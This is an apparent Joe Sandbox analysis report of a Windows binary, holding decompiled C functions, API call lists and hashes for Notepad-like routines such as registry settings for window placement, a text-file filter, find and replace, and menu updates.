                    0x002824ea
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002824f0
                    0x002824f9
                    0x002824fe
                    0x002824fe
                    0x00282500
                    0x00282501
                    0x00282506
                    0x00000000
                    0x00000000
                    0x00282516
                    0x00282516
                    0x00282518
                    0x00282519
                    0x0028251e
                    0x00000000
                    0x00000000
                    0x002823e9
                    0x002823e3
                    0x002823d7
                    0x0028235d
                    0x0028235d
                    0x00282364
                    0x00282366
                    0x00282366
                    0x00282374
                    0x00282383
                    0x00282383
                    0x00282385
                    0x00282385
                    0x0028238e
                    0x0028239c
                    0x0028239c
                    0x002823a0
                    0x002823a0
                    0x002823a9
                    0x002825e9
                    0x002825eb
                    0x002825f1
                    0x002823af
                    0x002823bc
                    0x002823be
                    0x002823cb
                    0x002823cb
                    0x002823a9
                    0x00000000

                    APIs
                    • GetClientRect.USER32 ref: 002823FE
                    • CreateWindowExW.USER32 ref: 0028243E
                    • CreateFontIndirectW.GDI32(00297100), ref: 0028244A
                    • SendMessageW.USER32(?,00000030,00000000,00000000), ref: 00282466
                    • SendMessageW.USER32(?,000000C5,00000000,00000000), ref: 00282478
                    • CreateWindowExW.USER32 ref: 00282499
                    • LoadStringW.USER32(?,00000206,002970FC,00000000), ref: 002824B2
                      • Part of subcall function 00281290: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 002812B5
                      • Part of subcall function 00281290: GetWindowPlacement.USER32(?,?), ref: 002812D6
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00281321
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0028133F
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 0028135D
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00281381
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 002813A5
                    • PostQuitMessage.USER32(00000000), ref: 002824DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Value$Create$MessageWindow$Send$ClientFontIndirectLoadPlacementPostQuitRectString
                    • String ID: VQRj$edit$jjjjh$jnj
                    • API String ID: 3987337835-3548645043
                    • Opcode ID: a1e9a088b440044b75dc435b629bdbd80fe915961714fb563a195529e405ab9e
                    • Instruction ID: 2b53c4a1264e6350e1134cc7a8918ad7f2b26b5cc1d221b23885593c0b876936
                    • Opcode Fuzzy Hash: a1e9a088b440044b75dc435b629bdbd80fe915961714fb563a195529e405ab9e
                    • Instruction Fuzzy Hash: 3C715B363652089BE714EFA9FC8DF6A7398EB84321F10452BFE08DB1D0D67598248760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281E60 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 75stringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E00281E60() {
				WCHAR* _t42;
				WCHAR* _t43;
				WCHAR* _t44;

				LoadStringW( *0x2970e0, 0x176, 0x297984, 0xff);
				_t42 = 0x297986 + lstrlenW(0x297984) * 2;
				lstrcpyW(_t42, L"*.txt");
				_t43 = _t42 + 2 + lstrlenW(_t42) * 2;
				LoadStringW( *0x2970e0, 0x175, _t43, 0xff);
				_t44 = _t43 + 2 + lstrlenW(_t43) * 2;
				lstrcpyW(_t44, L"*.*");
				 *((short*)(_t44 + 2 + lstrlenW(_t44) * 2)) = 0;
				 *0x2982cc = 0;
				 *0x2982d0 = 0;
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x2970e4), 0x119,  ~( *0x29715c) & 0x00000008);
				asm("sbb edx, edx");
				CheckMenuItem(GetMenu( *0x2970e4), 0x205,  ~( *0x2970f8) & 0x00000008);
				asm("sbb ecx, ecx");
				return ShowWindow( *0x2970f4,  ~( *0x2970f8) & 0x00000005);
			}






                    0x00281e7e
                    0x00281e8d
                    0x00281e9a
                    0x00281eae
                    0x00281eb9
                    0x00281ebe
                    0x00281ec8
                    0x00281ed9
                    0x00281ee6
                    0x00281eeb
                    0x00281ef7
                    0x00281f0c
                    0x00281f1b
                    0x00281f2a
                    0x00281f3a
                    0x00281f4a

                    APIs
                    • LoadStringW.USER32(?,00000176,00297984,000000FF), ref: 00281E7E
                    • lstrlenW.KERNEL32(00297984,?,?,?,?,?,?,?), ref: 00281E8B
                    • lstrcpyW.KERNEL32 ref: 00281E9A
                    • lstrlenW.KERNEL32(80000000,?,?,?,?,?,?,?), ref: 00281EA1
                    • LoadStringW.USER32(?,00000175,?,000000FF), ref: 00281EB9
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00281EBC
                    • lstrcpyW.KERNEL32 ref: 00281EC8
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00281ECF
                    • GetMenu.USER32(?), ref: 00281F03
                    • CheckMenuItem.USER32(00000000), ref: 00281F0C
                    • GetMenu.USER32(?), ref: 00281F27
                    • CheckMenuItem.USER32(00000000), ref: 00281F2A
                    • ShowWindow.USER32(?,?,?,?,?,?,?,?,?), ref: 00281F41
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
                    • String ID: *.*$*.txt
                    • API String ID: 3918228958-3257935098
                    • Opcode ID: 36f3749ec2c145ffb1ec381189e2efe330a46752e03151568a15bc1db7b000df
                    • Instruction ID: 9ee78d2d1968606edcfef0ee4bae9b0d193893bdaa9c418f8ab1c688c1add7d7
                    • Opcode Fuzzy Hash: 36f3749ec2c145ffb1ec381189e2efe330a46752e03151568a15bc1db7b000df
                    • Instruction Fuzzy Hash: 9A218E72674215BFD6089B79FC8EEBA3779EFC9B00701811BF609E31A0DA74A4118B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282200 Relevance: 22.6, APIs: 15, Instructions: 115memorywindowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00282200(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _t24;
				void* _t30;
				int _t35;
				void* _t43;
				void* _t58;
				int _t60;
				intOrPtr _t61;
				void* _t65;

				_v12 = lstrlenW( *(_a4 + 0x10));
				SendMessageW( *0x2970ec, 0xb1, 0, 0);
				_t4 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
				_t60 = _t4;
				_t24 = HeapAlloc(GetProcessHeap(), 0, _t60 + _t60);
				_t58 = _t24;
				if(_t58 == 0) {
					L12:
					return _t24;
				} else {
					do {
						GetWindowTextW( *0x2970ec, _t58, _t60);
						SendMessageW( *0x2970ec, 0xb0, 0,  &_v8);
						_t61 = _a4;
						_t30 = ( *(_t61 + 0xc) & 0x00000005) - 1;
						if(_t30 == 0) {
							goto L6;
						} else {
							_t24 = _t30 - 4;
							if(_t24 != 0) {
								goto L12;
							} else {
								_t65 = _v8 -  ~_t58;
								L6:
								if(_t65 == 0) {
									_v8 = 0xffffffff;
								}
								HeapFree(GetProcessHeap(), 0, _t58);
								_t35 = _v8;
								if(_t35 == 0xffffffff) {
									return SendMessageW( *0x2970ec, 0xb1, 0, 0);
								}
								goto L9;
							}
						}
						goto L13;
						L9:
						SendMessageW( *0x2970ec, 0xb1, _t35, _t35 + _v12);
						SendMessageW( *0x2970ec, 0xc2, 1,  *(_t61 + 0x14));
						_t16 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
						_t60 = _t16;
						_t43 = HeapAlloc(GetProcessHeap(), 0, _t60 + _t60);
						_t58 = _t43;
					} while (_t58 != 0);
					return _t43;
				}
				L13:
			}













                    0x0028222c
                    0x0028222f
                    0x0028223d
                    0x0028223d
                    0x0028224d
                    0x00282253
                    0x00282257
                    0x0028233d
                    0x0028233d
                    0x00282260
                    0x00282260
                    0x00282269
                    0x00282281
                    0x00282283
                    0x0028228c
                    0x0028228d
                    0x00000000
                    0x0028228f
                    0x0028228f
                    0x00282292
                    0x00000000
                    0x00282298
                    0x0028229c
                    0x002822a8
                    0x002822a8
                    0x002822aa
                    0x002822aa
                    0x002822bd
                    0x002822c3
                    0x002822c9
                    0x00000000
                    0x00282335
                    0x00000000
                    0x002822c9
                    0x00282292
                    0x00000000
                    0x002822cb
                    0x002822de
                    0x002822f2
                    0x00282300
                    0x00282300
                    0x0028230c
                    0x00282312
                    0x00282314
                    0x00282322
                    0x00282322
                    0x00000000

                    APIs
                    • lstrlenW.KERNEL32(?), ref: 00282210
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0028222F
                    • GetWindowTextLengthW.USER32(?), ref: 00282237
                    • GetProcessHeap.KERNEL32(00000000), ref: 00282246
                    • HeapAlloc.KERNEL32(00000000), ref: 0028224D
                    • GetWindowTextW.USER32 ref: 00282269
                    • SendMessageW.USER32(?,000000B0,00000000,?), ref: 00282281
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002822BA
                    • HeapFree.KERNEL32(00000000), ref: 002822BD
                    • SendMessageW.USER32(?,000000B1,?), ref: 002822DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002822F2
                    • GetWindowTextLengthW.USER32(?), ref: 002822FA
                    • GetProcessHeap.KERNEL32(00000000), ref: 00282309
                    • HeapAlloc.KERNEL32(00000000), ref: 0028230C
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00282335
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$MessageSend$ProcessTextWindow$AllocLength$Freelstrlen
                    • String ID:
                    • API String ID: 3644332920-0
                    • Opcode ID: 6cf8f58e82c58e0990c099f4d32a03d8eba7347ebfce06e0df65c9f23261b0f8
                    • Instruction ID: ac731161e8f10dc9904bad2bd5f6fb28fcc837cc38ef852e3bab359230ced980
                    • Opcode Fuzzy Hash: 6cf8f58e82c58e0990c099f4d32a03d8eba7347ebfce06e0df65c9f23261b0f8
                    • Instruction Fuzzy Hash: 3B318076610309EFD710DFA4EC8DF6AB778EB88714F50810AF909972E0CA71E905CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282690 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                    Download Yara Rule
                    C-Code - Quality: 55%
                    			E00282690(WCHAR* __eax) {
				short _v524;
				signed int _t14;
				signed int _t15;
				WCHAR* _t16;
				signed int _t17;
				int _t20;
				void* _t29;
				void* _t33;
				WCHAR* _t36;
				short _t37;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				intOrPtr* _t55;
				WCHAR* _t59;

				_t59 = __eax;
				_t37 = 0;
				if( *((short*)(__eax)) == 0x20) {
					do {
						_t59 =  &(_t59[1]);
					} while ( *_t59 == 0x20);
				}
				_t14 =  *_t59 & 0x0000ffff;
				_t41 = (0 | _t14 == 0x00000022) + (0 | _t14 == 0x00000022) + 0x00000020 & 0x0000ffff;
				if(_t14 == _t41) {
					_t59 =  &(_t59[1]);
				}
				_t15 =  *_t59 & 0x0000ffff;
				if(_t15 == 0) {
					L7:
					if( *_t59 == _t41) {
						goto L8;
					}
				} else {
					while(_t15 != _t41) {
						_t15 = _t59[1] & 0x0000ffff;
						_t59 =  &(_t59[1]);
						if(_t15 != 0) {
							continue;
						} else {
							goto L7;
						}
						goto L9;
					}
					L8:
					_t59 =  &(_t59[1]);
				}
				L9:
				while( *_t59 == 0x20) {
					_t59 =  &(_t59[1]);
				}
				_t16 = _t59;
				while(1) {
					_t42 =  *_t16 & 0x0000ffff;
					if(_t42 != 0x20 && _t42 != 0x2d && _t42 != 0x2f) {
						break;
					}
					_t16 =  &(_t16[1]);
					if(_t42 != 0x20) {
						_t43 =  *_t16 & 0x0000ffff;
						if(_t43 != 0) {
							_t16 =  &(_t16[1]);
						}
						while( *_t16 == 0x20) {
							_t16 =  &(_t16[1]);
						}
						if(_t43 == 0x50 || _t43 == 0x70) {
							if(_t37 == 0) {
								_t37 = 1;
								_t59 = _t16;
							}
						}
					}
					L45:
				}
				_t17 =  *_t59 & 0x0000ffff;
				if(_t17 == 0) {
					return _t17;
				} else {
					if(_t17 == 0x22) {
						_t59 =  &(_t59[1]);
						_t36 = _t59;
						if( *_t59 != 0) {
							while( *_t36 != 0x22) {
								_t36 =  &(_t36[1]);
								if( *_t36 != 0) {
									continue;
								}
								goto L32;
							}
						}
						L32:
						 *_t36 = 0;
					}
					_t55 =  *0x280000; // 0x905a4d
					_push(_t59);
					if( *_t55() != 0) {
						L35:
						 *0x280000(_t59, 0xffffffff);
						_t20 = InvalidateRect( *0x2970e4, 0, 0);
						if(_t37 == 0) {
							goto L43;
						}
						return  *0x280000();
					} else {
						lstrcpynW( &_v524, _t59, 0x103 - lstrlenW(L".txt"));
						lstrcatW( &_v524, L".txt");
						_t59 =  &_v524;
						_push(_t59);
						if( *_t55() == 0) {
							_t29 = E00282610( &_v524) - 2;
							if(_t29 == 0) {
								_t20 = DestroyWindow( *0x2970e4);
								L43:
								return _t20;
							}
							_t20 = _t29 - 4;
							if(_t20 != 0) {
								goto L43;
							}
							lstrcpyW(0x297570,  &_v524);
							 *0x297778 = 0;
							GetFileTitleW( &_v524, 0x297778, 0x32);
							 *0x297980 = 0;
							_t33 = CreateFileW( &_v524, 0x40000000, 2, 0, 4, 0x80, 0);
							if(_t33 != 0xffffffff) {
								CloseHandle(_t33);
							}
							return  *0x280000();
						} else {
							goto L35;
						}
					}
				}
				goto L45;
			}


















                    0x0028269b
                    0x0028269d
                    0x002826a3
                    0x002826a5
                    0x002826a5
                    0x002826a8
                    0x002826a5
                    0x002826ae
                    0x002826bd
                    0x002826c3
                    0x002826c5
                    0x002826c5
                    0x002826c8
                    0x002826ce
                    0x002826e1
                    0x002826e4
                    0x00000000
                    0x00000000
                    0x002826d0
                    0x002826d0
                    0x002826d5
                    0x002826d9
                    0x002826df
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002826df
                    0x002826e6
                    0x002826e6
                    0x002826e6
                    0x002826e9
                    0x002826ed
                    0x002826f0
                    0x002826f3
                    0x002826f9
                    0x00282700
                    0x00282700
                    0x00282706
                    0x00000000
                    0x00000000
                    0x00282712
                    0x00282718
                    0x0028271a
                    0x00282720
                    0x00282722
                    0x00282722
                    0x00282729
                    0x00282730
                    0x00282733
                    0x0028273c
                    0x00282745
                    0x00282747
                    0x0028274c
                    0x0028274c
                    0x00282745
                    0x0028273c
                    0x00000000
                    0x00282718
                    0x00282750
                    0x00282756
                    0x0028289d
                    0x0028275c
                    0x0028275f
                    0x00282761
                    0x00282768
                    0x0028276a
                    0x00282770
                    0x00282776
                    0x0028277d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0028277d
                    0x00282770
                    0x0028277f
                    0x00282781
                    0x00282781
                    0x00282785
                    0x0028278b
                    0x00282790
                    0x002827d4
                    0x002827d7
                    0x002827e8
                    0x002827f0
                    0x00000000
                    0x00000000
                    0x00282802
                    0x00282792
                    0x002827ad
                    0x002827bf
                    0x002827c5
                    0x002827cd
                    0x002827d2
                    0x0028280f
                    0x00282812
                    0x00282891
                    0x00282897
                    0x00000000
                    0x00282897
                    0x00282814
                    0x00282817
                    0x00000000
                    0x00000000
                    0x00282825
                    0x0028283b
                    0x00282842
                    0x00282861
                    0x0028286b
                    0x00282874
                    0x00282877
                    0x00282877
                    0x00282889
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002827d2
                    0x00282790
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID: .txt
                    • API String ID: 0-2195685702
                    • Opcode ID: d97aaed6261ee0f7788ec05ea34ab2a3be86cf1343b0855375b7853a0e0a4661
                    • Instruction ID: 3bf0595eebac5de2ad1b18e5868a71838e70d44a66886fd02558aea9b8b7c482
                    • Opcode Fuzzy Hash: d97aaed6261ee0f7788ec05ea34ab2a3be86cf1343b0855375b7853a0e0a4661
                    • Instruction Fuzzy Hash: 7D51E57E922226DBDF347F65EC8DBB6B3A4EF14710F14015AE986920D0F7704CA88761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281FF0 Relevance: 15.1, APIs: 10, Instructions: 92memorystringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00281FF0(intOrPtr _a4) {
				void* _v8;
				int _v12;
				signed int _t27;
				intOrPtr _t43;
				int _t56;
				void* _t58;

				_t43 = _a4;
				_v12 = lstrlenW( *(_t43 + 0x10));
				_t4 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
				_t56 = _t4;
				_t27 = HeapAlloc(GetProcessHeap(), 0, _t56 + _t56);
				_t58 = _t27;
				if(_t58 == 0) {
					L13:
					return _t27;
				} else {
					GetWindowTextW( *0x2970ec, _t58, _t56);
					SendMessageW( *0x2970ec, 0xb0, 0,  &_v8);
					_t27 =  *(_t43 + 0xc) & 0x00000005;
					if(_t27 > 5) {
						goto L13;
					} else {
						switch( *((intOrPtr*)(_t27 * 4 +  &M00282110))) {
							case 0:
								goto L10;
							case 1:
								goto L13;
							case 2:
								_t44 =  *(_t43 + 0x10);
								_t57 = _t58 + (_v8 - _v12) * 2 - 2;
								lstrlenW(_t44);
								if(_t57 < _t58) {
									L7:
									_t57 = 0;
								} else {
									while(lstrcmpW(_t57, _t44) != 0) {
										_t57 = _t57 - 2;
										if(_t57 >= _t58) {
											continue;
										} else {
											goto L7;
										}
										goto L8;
									}
								}
								L8:
								_t45 = _a4;
								L10:
								_v8 = _t57 - _t58 >> 1;
								HeapFree(GetProcessHeap(), 0, _t58);
								if(_t57 != 0) {
									return SendMessageW( *0x2970ec, 0xb1, _v8, _v8 + _v12);
								}
								_push(0x40);
								_push( *((intOrPtr*)(_t45 + 0x10)));
								_push(0x17b);
								_push( *0x2970e8);
								return  *0x280000();
								goto L14;
						}
					}
				}
				L14:
			}









                    0x00281ff7
                    0x0028200d
                    0x00282016
                    0x00282016
                    0x00282026
                    0x0028202c
                    0x00282030
                    0x0028210c
                    0x0028210c
                    0x00282036
                    0x0028203e
                    0x00282056
                    0x0028205f
                    0x00282065
                    0x00000000
                    0x0028206b
                    0x0028206b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00282075
                    0x0028207c
                    0x00282080
                    0x00282088
                    0x002820a3
                    0x002820a3
                    0x00000000
                    0x00282090
                    0x0028209c
                    0x002820a1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002820a1
                    0x00282090
                    0x002820a5
                    0x002820a5
                    0x002820ad
                    0x002820b6
                    0x002820c0
                    0x002820c8
                    0x00000000
                    0x00282100
                    0x002820d2
                    0x002820d4
                    0x002820d5
                    0x002820da
                    0x002820e7
                    0x00000000
                    0x00000000
                    0x0028206b
                    0x00282065
                    0x00000000

                    APIs
                    • lstrlenW.KERNEL32(?), ref: 00282000
                    • GetWindowTextLengthW.USER32(?), ref: 00282010
                    • GetProcessHeap.KERNEL32(00000000), ref: 0028201F
                    • HeapAlloc.KERNEL32(00000000), ref: 00282026
                    • GetWindowTextW.USER32 ref: 0028203E
                    • SendMessageW.USER32(?,000000B0,00000000,?), ref: 00282056
                    • lstrlenW.KERNEL32(?), ref: 00282080
                    • lstrcmpW.KERNEL32(?,?), ref: 00282092
                    • GetProcessHeap.KERNEL32(00000000), ref: 002820B9
                    • HeapFree.KERNEL32(00000000), ref: 002820C0
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$ProcessTextWindowlstrlen$AllocFreeLengthMessageSendlstrcmp
                    • String ID:
                    • API String ID: 1368074758-0
                    • Opcode ID: b403cecdd9249dbfddf1807cf819cc3136ca83ae7b2c4ec86302b041634080a7
                    • Instruction ID: 21995c4cf460e4af86b09fb496de49a243d0c83920fad183772143e15c0c25f3
                    • Opcode Fuzzy Hash: b403cecdd9249dbfddf1807cf819cc3136ca83ae7b2c4ec86302b041634080a7
                    • Instruction Fuzzy Hash: D6316D76611208EFCB10DFA8FCCDF6A7B79FB98711F148406EA0A97290C630A914CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282130 Relevance: 15.1, APIs: 10, Instructions: 73memorystringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00282130(intOrPtr __edi) {
				void* _v8;
				void* _v12;
				int _v16;
				void* _t19;
				void* _t26;
				signed int _t27;
				void* _t34;
				intOrPtr _t44;
				int _t45;

				_t44 = __edi;
				_v16 = lstrlenW( *(__edi + 0x10));
				_t3 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
				_t45 = _t3;
				_t19 = HeapAlloc(GetProcessHeap(), 0, _t45 + _t45);
				_t34 = _t19;
				if(_t34 != 0) {
					GetWindowTextW( *0x2970ec, _t34, _t45);
					SendMessageW( *0x2970ec, 0xb0,  &_v12,  &_v8);
					_t26 = ( *(__edi + 0xc) & 0x00000005) - 1;
					if(_t26 == 0) {
						L3:
						_t27 = _v12;
						if(_v8 - _t27 == _v16 && lstrcmpW( *(_t44 + 0x10), _t34 + _t27 * 2) == 0) {
							SendMessageW( *0x2970ec, 0xc2, 1,  *(_t44 + 0x14));
						}
						HeapFree(GetProcessHeap(), 0, _t34);
						return E00281FF0(_t44);
					}
					_t19 = _t26 - 4;
					if(_t19 == 0) {
						goto L3;
					}
				}
				return _t19;
			}












                    0x00282130
                    0x00282149
                    0x00282152
                    0x00282152
                    0x00282162
                    0x00282168
                    0x0028216c
                    0x0028217a
                    0x00282199
                    0x002821a1
                    0x002821a2
                    0x002821a9
                    0x002821a9
                    0x002821b4
                    0x002821da
                    0x002821da
                    0x002821e6
                    0x00000000
                    0x002821ed
                    0x002821a4
                    0x002821a7
                    0x00000000
                    0x00000000
                    0x002821a7
                    0x002821f7

                    APIs
                    • lstrlenW.KERNEL32(?), ref: 0028213C
                    • GetWindowTextLengthW.USER32(?), ref: 0028214C
                    • GetProcessHeap.KERNEL32(00000000), ref: 0028215B
                    • HeapAlloc.KERNEL32(00000000), ref: 00282162
                    • GetWindowTextW.USER32 ref: 0028217A
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00282199
                    • lstrcmpW.KERNEL32(?), ref: 002821BE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002821DA
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002821DF
                    • HeapFree.KERNEL32(00000000), ref: 002821E6
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$MessageProcessSendTextWindow$AllocFreeLengthlstrcmplstrlen
                    • String ID:
                    • API String ID: 276103653-0
                    • Opcode ID: c514d8f6ecc0d49a918f88514ca0b310a8ec4b8aa51e9f1a4eb1f95d677bb2fc
                    • Instruction ID: c0cec1cefe3ffd0548520bcef76ecaa997d3f50c056d272f78f392dfc354abf1
                    • Opcode Fuzzy Hash: c514d8f6ecc0d49a918f88514ca0b310a8ec4b8aa51e9f1a4eb1f95d677bb2fc
                    • Instruction Fuzzy Hash: 13213E76A10209EFDB10EFA4EC8CE6A777CFB48300B008506FA0A97290DA70A9548B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281F50 Relevance: 15.1, APIs: 10, Instructions: 62windowclipboardCOMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E00281F50(struct HMENU__* __esi) {
				signed int _t4;
				signed int _t8;
				signed int _t17;
				int _t23;

				_t4 = SendMessageW( *0x2970ec, 0xc6, 0, 0);
				asm("sbb eax, eax");
				EnableMenuItem(__esi, 0x110,  ~_t4 + 1);
				_t8 = IsClipboardFormatAvailable(1);
				asm("sbb eax, eax");
				EnableMenuItem(__esi, 0x113,  ~_t8 + 1);
				_t23 = 0 | SendMessageW( *0x2970ec, 0xb0, 0, 0) >> 0x00000010 == _t12;
				EnableMenuItem(__esi, 0x111, _t23);
				EnableMenuItem(__esi, 0x112, _t23);
				EnableMenuItem(__esi, 0x114, _t23);
				_t17 = GetWindowTextLengthW( *0x2970ec);
				asm("sbb eax, eax");
				return EnableMenuItem(__esi, 0x116,  ~_t17 + 1);
			}







                    0x00281f67
                    0x00281f71
                    0x00281f7b
                    0x00281f7f
                    0x00281f87
                    0x00281f91
                    0x00281faf
                    0x00281fb9
                    0x00281fc2
                    0x00281fcb
                    0x00281fd3
                    0x00281fdb
                    0x00281fe9

                    APIs
                    • SendMessageW.USER32(?,000000C6,00000000,00000000), ref: 00281F67
                    • EnableMenuItem.USER32 ref: 00281F7B
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00281F7F
                    • EnableMenuItem.USER32 ref: 00281F91
                    • SendMessageW.USER32(?,000000B0,00000000,00000000), ref: 00281FA3
                    • EnableMenuItem.USER32 ref: 00281FB9
                    • EnableMenuItem.USER32 ref: 00281FC2
                    • EnableMenuItem.USER32 ref: 00281FCB
                    • GetWindowTextLengthW.USER32(?), ref: 00281FD3
                    • EnableMenuItem.USER32 ref: 00281FE5
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EnableItemMenu$MessageSend$AvailableClipboardFormatLengthTextWindow
                    • String ID:
                    • API String ID: 2096502293-0
